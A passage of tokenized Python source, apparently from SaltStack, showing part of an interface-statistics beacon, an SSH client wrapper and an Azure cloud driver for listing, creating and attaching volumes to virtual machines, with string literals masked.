interface ] - LAST_STATS [ interface ] <EOL> _ret_diff = { } <EOL> if _diff_stats : <EOL> _diff_stats_dict = { } <EOL> LAST_STATS [ interface ] = _stats [ interface ] <EOL> for item in _diff_stats : <EOL> _diff_stats_dict . update ( item ) <EOL> for attr in config [ interface ] : <EOL> if attr in _diff_stats_dict : <EOL> config_value = None <EOL> if config [ interface ] [ attr ] and '<STR_LIT>' in config [ interface ] [ attr ] : <EOL> config_value = config [ interface ] [ attr ] [ '<STR_LIT>' ] <EOL> new_value = ast . literal_eval ( _diff_stats_dict [ attr ] ) <EOL> if not config_value or config_value == new_value : <EOL> _send_event = True <EOL> _ret_diff [ attr ] = new_value <EOL> if _send_event : <EOL> if coalesce : <EOL> changes [ interface ] = _ret_diff <EOL> else : <EOL> ret . append ( { '<STR_LIT>' : interface , '<STR_LIT>' : interface , '<STR_LIT>' : _ret_diff } ) <EOL> if coalesce and changes : <EOL> grains_info = salt . loader . grains ( __opts__ , True ) <EOL> __grains__ . update ( grains_info ) <EOL> ret . append ( { '<STR_LIT>' : '<STR_LIT:result>' , '<STR_LIT>' : changes } ) <EOL> return ret </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import copy <EOL> import logging <EOL> import salt . config <EOL> import salt . syspaths as syspaths <EOL> from salt . exceptions import SaltClientError <EOL> log = logging . getLogger ( __name__ ) <EOL> class SSHClient ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , <EOL> c_path = os . path . join ( syspaths . CONFIG_DIR , '<STR_LIT>' ) , <EOL> mopts = None ) : <EOL> if mopts : <EOL> self . opts = mopts <EOL> else : <EOL> if os . path . isdir ( c_path ) : <EOL> log . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> self . __class__ . __name__ , c_path <EOL> ) <EOL> ) <EOL> self . opts = salt . config . client_config ( c_path ) <EOL> def _prep_ssh ( <EOL> self , <EOL> tgt , <EOL> fun , <EOL> arg = ( ) , <EOL> timeout = None , <EOL> expr_form = '<STR_LIT>' , <EOL> kwarg = None , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> opts = copy . deepcopy ( self . opts ) <EOL> opts . update ( kwargs ) <EOL> if timeout : <EOL> opts [ '<STR_LIT>' ] = timeout <EOL> arg = salt . utils . args . condition_input ( arg , kwarg ) <EOL> opts [ '<STR_LIT>' ] = [ fun ] + arg <EOL> opts [ '<STR_LIT>' ] = expr_form <EOL> opts [ '<STR_LIT>' ] = tgt <EOL> opts [ '<STR_LIT>' ] = arg <EOL> return salt . client . ssh . SSH ( opts ) <EOL> def cmd_iter ( <EOL> self , <EOL> tgt , <EOL> fun , <EOL> arg = ( ) , <EOL> timeout = None , <EOL> expr_form = '<STR_LIT>' , <EOL> ret = '<STR_LIT>' , <EOL> kwarg = None , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ssh = self . _prep_ssh ( <EOL> tgt , <EOL> fun , <EOL> arg , <EOL> timeout , <EOL> expr_form , <EOL> kwarg , <EOL> ** kwargs ) <EOL> for ret in ssh . run_iter ( jid = kwargs . get ( '<STR_LIT>' , None ) ) : <EOL> yield ret <EOL> def cmd ( <EOL> self , <EOL> tgt , <EOL> fun , <EOL> arg = ( ) , <EOL> timeout = None , <EOL> expr_form = '<STR_LIT>' , <EOL> kwarg = None , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ssh = self . _prep_ssh ( <EOL> tgt , <EOL> fun , <EOL> arg , <EOL> timeout , <EOL> expr_form , <EOL> kwarg , <EOL> ** kwargs ) <EOL> final = { } <EOL> for ret in ssh . run_iter ( jid = kwargs . get ( '<STR_LIT>' , None ) ) : <EOL> final . update ( ret ) <EOL> return final <EOL> def cmd_sync ( self , low ) : <EOL> '''<STR_LIT>''' <EOL> kwargs = copy . deepcopy ( low ) <EOL> for ignore in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if ignore in kwargs : <EOL> del kwargs [ ignore ] <EOL> return self . cmd ( low [ '<STR_LIT>' ] , <EOL> low [ '<STR_LIT>' ] , <EOL> low . get ( '<STR_LIT>' , [ ] ) , <EOL> low . get ( '<STR_LIT>' ) , <EOL> low . get ( '<STR_LIT>' ) , <EOL> low . get ( '<STR_LIT>' ) , <EOL> ** kwargs ) <EOL> def cmd_async ( self , low , timeout = None ) : <EOL> '''<STR_LIT>''' <EOL> raise SaltClientError </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import copy <EOL> import logging <EOL> import pprint <EOL> import time <EOL> import yaml <EOL> import salt . config as config <EOL> from salt . exceptions import SaltCloudSystemExit <EOL> import salt . utils . cloud <EOL> HAS_LIBS = False <EOL> try : <EOL> import azure <EOL> import azure . storage <EOL> import azure . servicemanagement <EOL> from azure . common import ( AzureConflictHttpError , <EOL> AzureMissingResourceHttpError , <EOL> AzureException ) <EOL> import salt . utils . msazure <EOL> from salt . utils . msazure import object_to_dict <EOL> HAS_LIBS = True <EOL> except ImportError : <EOL> pass <EOL> __virtualname__ = '<STR_LIT>' <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if get_configured_provider ( ) is False : <EOL> return False <EOL> if get_dependencies ( ) is False : <EOL> return False <EOL> return __virtualname__ <EOL> def get_configured_provider ( ) : <EOL> '''<STR_LIT>''' <EOL> return config . is_provider_configured ( <EOL> __opts__ , <EOL> __active_provider_name__ or __virtualname__ , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> def get_dependencies ( ) : <EOL> '''<STR_LIT>''' <EOL> return config . check_driver_dependencies ( <EOL> __virtualname__ , <EOL> { '<STR_LIT>' : HAS_LIBS } <EOL> ) <EOL> def get_conn ( ) : <EOL> '''<STR_LIT>''' <EOL> certificate_path = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> subscription_id = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> management_host = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , <EOL> __opts__ , <EOL> search_global = False , <EOL> default = '<STR_LIT>' <EOL> ) <EOL> return azure . servicemanagement . ServiceManagementService ( <EOL> subscription_id , certificate_path , management_host <EOL> ) <EOL> def script ( vm_ ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . cloud . os_script ( <EOL> config . get_cloud_config_value ( '<STR_LIT>' , vm_ , __opts__ ) , <EOL> vm_ , <EOL> __opts__ , <EOL> salt . utils . cloud . salt_config_to_yaml ( <EOL> salt . utils . cloud . minion_config ( __opts__ , vm_ ) <EOL> ) <EOL> ) <EOL> def avail_locations ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> locations = conn . list_locations ( ) <EOL> for location in locations : <EOL> ret [ location . name ] = { <EOL> '<STR_LIT:name>' : location . name , <EOL> '<STR_LIT>' : location . display_name , <EOL> '<STR_LIT>' : location . available_services , <EOL> } <EOL> return ret <EOL> def avail_images ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> for item in conn . list_os_images ( ) : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> for item in conn . list_vm_images ( ) : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def avail_sizes ( call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> conn = get_conn ( ) <EOL> data = conn . list_role_sizes ( ) <EOL> ret = { } <EOL> for item in data . role_sizes : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def list_nodes ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> ret = { } <EOL> nodes = list_nodes_full ( conn , call ) <EOL> for node in nodes : <EOL> ret [ node ] = { '<STR_LIT:name>' : node } <EOL> for prop in ( '<STR_LIT:id>' , '<STR_LIT:image>' , '<STR_LIT:size>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> ret [ node ] [ prop ] = nodes [ node ] . get ( prop ) <EOL> return ret <EOL> def list_nodes_full ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> services = list_hosted_services ( conn = conn , call = call ) <EOL> for service in services : <EOL> for deployment in services [ service ] [ '<STR_LIT>' ] : <EOL> deploy_dict = services [ service ] [ '<STR_LIT>' ] [ deployment ] <EOL> deploy_dict_no_role_info = copy . deepcopy ( deploy_dict ) <EOL> del deploy_dict_no_role_info [ '<STR_LIT>' ] <EOL> del deploy_dict_no_role_info [ '<STR_LIT>' ] <EOL> roles = deploy_dict [ '<STR_LIT>' ] <EOL> for role in roles : <EOL> role_instances = deploy_dict [ '<STR_LIT>' ] <EOL> ret [ role ] = roles [ role ] <EOL> ret [ role ] . update ( role_instances [ role ] ) <EOL> ret [ role ] [ '<STR_LIT:id>' ] = role <EOL> ret [ role ] [ '<STR_LIT>' ] = service <EOL> if role_instances [ role ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ret [ role ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> elif role_instances [ role ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ret [ role ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> else : <EOL> ret [ role ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> ret [ role ] [ '<STR_LIT>' ] = [ ] <EOL> ret [ role ] [ '<STR_LIT>' ] = [ ] <EOL> ret [ role ] [ '<STR_LIT>' ] = deploy_dict_no_role_info <EOL> ret [ role ] [ '<STR_LIT:url>' ] = deploy_dict [ '<STR_LIT:url>' ] <EOL> ip_address = role_instances [ role ] [ '<STR_LIT>' ] <EOL> if ip_address : <EOL> if salt . utils . cloud . is_public_ip ( ip_address ) : <EOL> ret [ role ] [ '<STR_LIT>' ] . append ( ip_address ) <EOL> else : <EOL> ret [ role ] [ '<STR_LIT>' ] . append ( ip_address ) <EOL> ret [ role ] [ '<STR_LIT:size>' ] = role_instances [ role ] [ '<STR_LIT>' ] <EOL> ret [ role ] [ '<STR_LIT:image>' ] = roles [ role ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return ret <EOL> def list_hosted_services ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> services = conn . list_hosted_services ( ) <EOL> for service in services : <EOL> props = service . hosted_service_properties <EOL> ret [ service . service_name ] = { <EOL> '<STR_LIT:name>' : service . service_name , <EOL> '<STR_LIT:url>' : service . url , <EOL> '<STR_LIT>' : props . affinity_group , <EOL> '<STR_LIT>' : props . date_created , <EOL> '<STR_LIT>' : props . date_last_modified , <EOL> '<STR_LIT:description>' : props . description , <EOL> '<STR_LIT>' : props . extended_properties , <EOL> '<STR_LIT:label>' : props . label , <EOL> '<STR_LIT:location>' : props . location , <EOL> '<STR_LIT:status>' : props . status , <EOL> '<STR_LIT>' : { } , <EOL> } <EOL> deployments = conn . get_hosted_service_properties ( <EOL> service_name = service . service_name , embed_detail = True <EOL> ) <EOL> for deployment in deployments . deployments : <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] = { <EOL> '<STR_LIT>' : deployment . configuration , <EOL> '<STR_LIT>' : deployment . created_time , <EOL> '<STR_LIT>' : deployment . deployment_slot , <EOL> '<STR_LIT>' : deployment . extended_properties , <EOL> '<STR_LIT>' : deployment . input_endpoint_list , <EOL> '<STR_LIT:label>' : deployment . label , <EOL> '<STR_LIT>' : deployment . last_modified_time , <EOL> '<STR_LIT>' : deployment . locked , <EOL> '<STR_LIT:name>' : deployment . name , <EOL> '<STR_LIT>' : deployment . persistent_vm_downtime_info , <EOL> '<STR_LIT>' : deployment . private_id , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : deployment . rollback_allowed , <EOL> '<STR_LIT>' : deployment . sdk_version , <EOL> '<STR_LIT:status>' : deployment . status , <EOL> '<STR_LIT>' : deployment . upgrade_domain_count , <EOL> '<STR_LIT>' : deployment . upgrade_status , <EOL> '<STR_LIT:url>' : deployment . url , <EOL> } <EOL> for role_instance in deployment . role_instance_list : <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role_instance . role_name ] = { <EOL> '<STR_LIT>' : role_instance . fqdn , <EOL> '<STR_LIT>' : role_instance . instance_error_code , <EOL> '<STR_LIT>' : role_instance . instance_fault_domain , <EOL> '<STR_LIT>' : role_instance . instance_name , <EOL> '<STR_LIT>' : role_instance . instance_size , <EOL> '<STR_LIT>' : role_instance . instance_state_details , <EOL> '<STR_LIT>' : role_instance . instance_status , <EOL> '<STR_LIT>' : role_instance . instance_upgrade_domain , <EOL> '<STR_LIT>' : role_instance . ip_address , <EOL> '<STR_LIT>' : role_instance . power_state , <EOL> '<STR_LIT>' : role_instance . role_name , <EOL> } <EOL> for role in deployment . role_list : <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role . role_name ] = { <EOL> '<STR_LIT>' : role . role_name , <EOL> '<STR_LIT>' : role . os_version , <EOL> } <EOL> role_info = conn . get_role ( <EOL> service_name = service . service_name , <EOL> deployment_name = deployment . name , <EOL> role_name = role . role_name , <EOL> ) <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role . role_name ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : role_info . availability_set_name , <EOL> '<STR_LIT>' : role_info . configuration_sets , <EOL> '<STR_LIT>' : role_info . data_virtual_hard_disks , <EOL> '<STR_LIT>' : role_info . os_version , <EOL> '<STR_LIT>' : role_info . role_name , <EOL> '<STR_LIT>' : role_info . role_size , <EOL> '<STR_LIT>' : role_info . role_type , <EOL> } <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role . role_name ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . disk_label , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . disk_name , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . host_caching , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . media_link , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . os , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . source_image_name , <EOL> } <EOL> return ret <EOL> def list_nodes_select ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> return salt . utils . cloud . list_nodes_select ( <EOL> list_nodes_full ( conn , '<STR_LIT>' ) , __opts__ [ '<STR_LIT>' ] , call , <EOL> ) <EOL> def show_instance ( name , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> nodes = list_nodes_full ( ) <EOL> if name not in nodes : <EOL> return { } <EOL> salt . utils . cloud . cache_node ( nodes [ name ] , __active_provider_name__ , __opts__ ) <EOL> return nodes [ name ] <EOL> def create ( vm_ ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> if vm_ [ '<STR_LIT>' ] and config . is_profile_configured ( __opts__ , <EOL> __active_provider_name__ or '<STR_LIT>' , <EOL> vm_ [ '<STR_LIT>' ] , <EOL> vm_ = vm_ ) is False : <EOL> return False <EOL> except AttributeError : <EOL> pass <EOL> if '<STR_LIT>' in vm_ : <EOL> vm_ [ '<STR_LIT>' ] = vm_ . pop ( '<STR_LIT>' ) <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> { <EOL> '<STR_LIT:name>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> } , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> log . info ( '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) ) <EOL> conn = get_conn ( ) <EOL> label = vm_ . get ( '<STR_LIT:label>' , vm_ [ '<STR_LIT:name>' ] ) <EOL> service_name = vm_ . get ( '<STR_LIT>' , vm_ [ '<STR_LIT:name>' ] ) <EOL> service_kwargs = { <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT:label>' : label , <EOL> '<STR_LIT:description>' : vm_ . get ( '<STR_LIT>' , vm_ [ '<STR_LIT:name>' ] ) , <EOL> } <EOL> loc_error = False <EOL> if '<STR_LIT:location>' in vm_ : <EOL> if '<STR_LIT>' in vm_ : <EOL> loc_error = True <EOL> else : <EOL> service_kwargs [ '<STR_LIT:location>' ] = vm_ [ '<STR_LIT:location>' ] <EOL> elif '<STR_LIT>' in vm_ : <EOL> service_kwargs [ '<STR_LIT>' ] = vm_ [ '<STR_LIT>' ] <EOL> else : <EOL> loc_error = True <EOL> if loc_error : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> ssh_port = config . get_cloud_config_value ( '<STR_LIT:port>' , vm_ , __opts__ , <EOL> default = '<STR_LIT>' , search_global = True ) <EOL> ssh_endpoint = azure . servicemanagement . ConfigurationSetInputEndpoint ( <EOL> name = '<STR_LIT>' , <EOL> protocol = '<STR_LIT>' , <EOL> port = ssh_port , <EOL> local_port = '<STR_LIT>' , <EOL> ) <EOL> network_config = azure . servicemanagement . ConfigurationSet ( ) <EOL> network_config . input_endpoints . input_endpoints . append ( ssh_endpoint ) <EOL> network_config . configuration_set_type = '<STR_LIT>' <EOL> if '<STR_LIT>' in vm_ : <EOL> system_config = azure . servicemanagement . WindowsConfigurationSet ( <EOL> computer_name = vm_ [ '<STR_LIT:name>' ] , <EOL> admin_username = vm_ [ '<STR_LIT>' ] , <EOL> admin_password = vm_ [ '<STR_LIT>' ] , <EOL> ) <EOL> smb_port = '<STR_LIT>' <EOL> if '<STR_LIT>' in vm_ : <EOL> smb_port = vm_ [ '<STR_LIT>' ] <EOL> smb_endpoint = azure . servicemanagement . ConfigurationSetInputEndpoint ( <EOL> name = '<STR_LIT>' , <EOL> protocol = '<STR_LIT>' , <EOL> port = smb_port , <EOL> local_port = smb_port , <EOL> ) <EOL> network_config . input_endpoints . input_endpoints . append ( smb_endpoint ) <EOL> system_config . domain_join = None <EOL> system_config . win_rm = None <EOL> else : <EOL> system_config = azure . servicemanagement . LinuxConfigurationSet ( <EOL> host_name = vm_ [ '<STR_LIT:name>' ] , <EOL> user_name = vm_ [ '<STR_LIT>' ] , <EOL> user_password = vm_ [ '<STR_LIT>' ] , <EOL> disable_ssh_password_authentication = False , <EOL> ) <EOL> media_link = vm_ [ '<STR_LIT>' ] <EOL> media_link += '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) <EOL> os_hd = azure . servicemanagement . OSVirtualHardDisk ( vm_ [ '<STR_LIT:image>' ] , media_link ) <EOL> vm_kwargs = { <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> '<STR_LIT:label>' : label , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : system_config , <EOL> '<STR_LIT>' : os_hd , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:size>' ] , <EOL> '<STR_LIT>' : network_config , <EOL> } <EOL> if '<STR_LIT>' in vm_ : <EOL> vm_kwargs [ '<STR_LIT>' ] = vm_ [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in vm_ : <EOL> network_config . subnet_names . append ( vm_ [ '<STR_LIT>' ] ) <EOL> log . debug ( '<STR_LIT>' . format ( vm_kwargs ) ) <EOL> event_kwargs = { '<STR_LIT>' : service_kwargs . copy ( ) , <EOL> '<STR_LIT>' : vm_kwargs . copy ( ) } <EOL> del event_kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> del event_kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> del event_kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> event_kwargs , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> log . debug ( '<STR_LIT>' . format ( vm_kwargs ) ) <EOL> try : <EOL> conn . create_hosted_service ( ** service_kwargs ) <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> error = '<STR_LIT>' <EOL> if error in str ( exc ) : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] <EOL> ) , <EOL> exc_info_on_loglevel = logging . DEBUG <EOL> ) <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] , str ( exc ) <EOL> ) , <EOL> exc_info_on_loglevel = logging . DEBUG <EOL> ) <EOL> return False <EOL> try : <EOL> result = conn . create_virtual_machine_deployment ( ** vm_kwargs ) <EOL> log . debug ( '<STR_LIT>' . format ( result . request_id ) ) <EOL> _wait_for_async ( conn , result . request_id ) <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> del vm_kwargs [ '<STR_LIT>' ] <EOL> del vm_kwargs [ '<STR_LIT:label>' ] <EOL> del vm_kwargs [ '<STR_LIT>' ] <EOL> result = conn . add_role ( ** vm_kwargs ) <EOL> _wait_for_async ( conn , result . request_id ) <EOL> except Exception as exc : <EOL> error = '<STR_LIT>' <EOL> if error in str ( exc ) : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] <EOL> ) , <EOL> exc_info_on_loglevel = logging . DEBUG <EOL> ) <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_ [ '<STR_LIT:name>' ] , str ( exc ) <EOL> ) , <EOL> exc_info_on_loglevel = logging . DEBUG <EOL> ) <EOL> return False <EOL> def wait_for_hostname ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> conn . get_role ( service_name , service_name , vm_ [ '<STR_LIT:name>' ] ) <EOL> data = show_instance ( vm_ [ '<STR_LIT:name>' ] , call = '<STR_LIT:action>' ) <EOL> if '<STR_LIT:url>' in data and data [ '<STR_LIT:url>' ] != str ( '<STR_LIT>' ) : <EOL> return data [ '<STR_LIT:url>' ] <EOL> except AzureMissingResourceHttpError : <EOL> pass <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> return False <EOL> hostname = salt . utils . cloud . wait_for_fun ( <EOL> wait_for_hostname , <EOL> timeout = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , vm_ , __opts__ , default = <NUM_LIT:15> * <NUM_LIT> ) , <EOL> ) <EOL> if not hostname : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> vm_ [ '<STR_LIT>' ] = hostname . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> vm_ [ '<STR_LIT:password>' ] = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , vm_ , __opts__ <EOL> ) <EOL> ret = salt . utils . cloud . bootstrap ( vm_ , __opts__ ) <EOL> volumes = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , vm_ , __opts__ , search_global = True <EOL> ) <EOL> if volumes : <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> { '<STR_LIT>' : volumes } , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> log . info ( '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) ) <EOL> created = create_attach_volumes ( <EOL> vm_ [ '<STR_LIT:name>' ] , <EOL> { <EOL> '<STR_LIT>' : volumes , <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : media_link , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : vm_ . get ( '<STR_LIT>' , False ) <EOL> } , <EOL> call = '<STR_LIT:action>' <EOL> ) <EOL> ret [ '<STR_LIT>' ] = created <EOL> data = show_instance ( vm_ [ '<STR_LIT:name>' ] , call = '<STR_LIT:action>' ) <EOL> log . info ( '<STR_LIT>' . format ( vm_ ) ) <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> vm_ , pprint . pformat ( data ) <EOL> ) <EOL> ) <EOL> ret . update ( data ) <EOL> salt . utils . cloud . fire_event ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( vm_ [ '<STR_LIT:name>' ] ) , <EOL> { <EOL> '<STR_LIT:name>' : vm_ [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : vm_ [ '<STR_LIT>' ] , <EOL> } , <EOL> transport = __opts__ [ '<STR_LIT>' ] <EOL> ) <EOL> return ret <EOL> def create_attach_volumes ( name , kwargs , call = None , wait_to_finish = True ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if isinstance ( kwargs [ '<STR_LIT>' ] , str ) : <EOL> volumes = yaml . safe_load ( kwargs [ '<STR_LIT>' ] ) <EOL> else : <EOL> volumes = kwargs [ '<STR_LIT>' ] <EOL> conn = get_conn ( ) <EOL> ret = [ ] <EOL> for volume in volumes : <EOL> if "<STR_LIT>" in volume : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> volume . setdefault ( "<STR_LIT>" , volume . get ( "<STR_LIT:size>" , <NUM_LIT:100> ) ) <EOL> volume . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> volume . setdefault ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] [ : - <NUM_LIT:4> ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume_dict = { <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] <EOL> } <EOL> kwargs_add_data_disk = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> for key in set ( volume . keys ( ) ) - set ( kwargs_add_data_disk ) : <EOL> del volume [ key ] <EOL> attach = conn . add_data_disk ( kwargs [ "<STR_LIT>" ] , kwargs [ "<STR_LIT>" ] , kwargs [ "<STR_LIT>" ] , <EOL> ** volume ) <EOL> log . debug ( attach ) <EOL> if attach : <EOL> msg = ( <EOL> '<STR_LIT>' . format ( <EOL> volume_dict [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> name , <EOL> ) <EOL> ) <EOL> log . info ( msg ) <EOL> ret . append ( msg ) <EOL> else : <EOL> log . error ( '<STR_LIT>' . format ( volume_dict ) ) <EOL> return ret <EOL> def create_attach_volumes ( name , 